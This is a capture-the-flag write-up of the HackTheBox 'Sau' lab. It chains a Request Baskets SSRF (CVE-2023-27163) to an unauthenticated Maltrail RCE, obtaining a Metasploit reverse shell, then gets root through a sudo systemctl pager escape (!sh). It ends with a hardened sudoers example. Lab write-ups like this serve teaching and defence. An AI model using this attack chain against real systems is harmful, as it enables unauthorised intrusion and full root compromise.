Inside the Box: Sau HackTheBox Uncovered
Embark on an exhilarating journey as we delve into the electrifying world of hacking, dissecting the “Sau” HackTheBox lab. With nerves of steel and a cunning eye for detail, we uncover hidden secrets within this mysterious domain. Armed with Nmap scans, we hunt for vulnerabilities, paving the path to exhilarating SSRF exploits and spine-tingling RCE attacks. Join me as I infiltrate, escalate, and ultimately conquer the challenge, unraveling the thrilling saga of penetration testing.
Information Gathering:
Initial Scanning:
sudo nmap -sV -sS -A <IP>
I ran an Nmap scan (SYN scan with version detection and the -A aggressive options) to identify open ports and the services running on the target. It revealed the following:
- Port 22 (SSH) is open, running OpenSSH 8.2p1 on an Ubuntu-based system.
- Port 80 (HTTP) is filtered: the probes are dropped by a firewall, so whatever listens there cannot be reached directly from outside.
- Port 55555 is open, but Nmap could not identify the service.
Directory Enumeration:
I used Gobuster to enumerate directories on the web server, adding the common file extensions .php and .txt. Since port 80 is filtered, the only web service reachable from outside is the one on port 55555, so that is the one to enumerate:
gobuster dir -u http://<IP>:55555/ -x php,txt -w /usr/share/wordlists/dirb/common.txt -t 50
The results showed two directories:
/demo
/web
Visiting /web showed the Request Baskets web service, version 1.2.1.
Under /demo the server is running Maltrail v0.53, a malicious traffic detection system.
Vulnerability Analysis:
I searched for known exploits related to Request Baskets and found a hit: "SSRF on Request-Baskets (CVE-2023-27163)". In this version anyone can create a basket whose forward_url points at an arbitrary host, so the service relays requests to hosts it can reach but we cannot, including the firewalled port 80 on the box itself. That is why Maltrail, which is what listens behind the filtered port 80, shows up under /demo on port 55555.
Additionally, I found an exploit for Maltrail: an unauthenticated remote code execution (RCE). Maltrail v0.53 interpolates the username field of its /login handler into a shell command without sanitising it, so a crafted login attempt runs arbitrary commands as the user Maltrail runs as.
Initial Foothold:
I decided to exploit the Maltrail service using Metasploit. Here are the steps:
- Launched msfconsole to open Metasploit.
- Searched for the Maltrail exploit module with search maltrail.
- Selected the exploit module (e.g., use 0).
- Checked the available options with show options.
- Set the target IP with set RHOST <IP>.
- Set the target port to 55555 with set RPORT 55555.
- Specified the target URI as /demo with set TARGETURI /demo.
- Set the listener IP (LHOST) and port (LPORT) for the reverse shell.
- Finally, executed the exploit with run.
Note that RPORT is 55555 and TARGETURI is /demo, not port 80 and /: the module's requests go to Request Baskets, which relays them to Maltrail on the firewalled port, so the SSRF is what makes the RCE reachable at all.
As a result, I obtained a Meterpreter session, gaining initial access to the target machine.
Privilege Escalation:
I ran sudo -l to check whether any command could be run through sudo without a password.
It showed that systemctl could be run as root on trail.service, so I checked GTFOBins for a way to turn that into a root shell. systemctl status pipes its output through a pager (less) that runs as root, and less lets you spawn a shell with !:
# Execute
sudo /usr/bin/systemctl status trail.service
# Break environment
!sh
This granted me a root shell. One caveat: the pager only stays open when the output does not fit on the screen, so if less quits straight away, shrink the terminal window until the status output overflows and the prompt appears.
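The sudo rule that makes this possible, beside a version that does not, as an added example that is not from the writeup or the box. The exact sudoers line on the machine is not shown above, so the weak rule is an assumption modelled on the sudo -l result, and the wrapper path /usr/local/sbin/trail-status is assumed.

```sudoers
# Weak: systemctl status spawns 'less' as root, and less accepts !<command>.
puma ALL=(root) NOPASSWD: /usr/bin/systemctl status trail.service

# Corrected: grant a root-owned wrapper that disables the pager.
# /usr/local/sbin/trail-status (root:root, mode 0755) contains:
#   #!/bin/sh
#   exec /usr/bin/systemctl status trail.service --no-pager
puma ALL=(root) NOPASSWD: /usr/local/sbin/trail-status
```

The wrapper must not be writable by the user, otherwise it is a simpler root shell than the pager. Disabling the pager has to happen inside the granted command: with sudo's default env_reset the user's environment (such as SYSTEMD_PAGER) is not what systemctl sees, so neither side can rely on it.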
Finally, I retrieved the user and root flags:
- The user flag is located at /home/puma/user.txt
- The root flag is located at /root/root.txt
With that, the Sau HackTheBox lab was fully compromised: user and root privileges obtained, and both flags retrieved.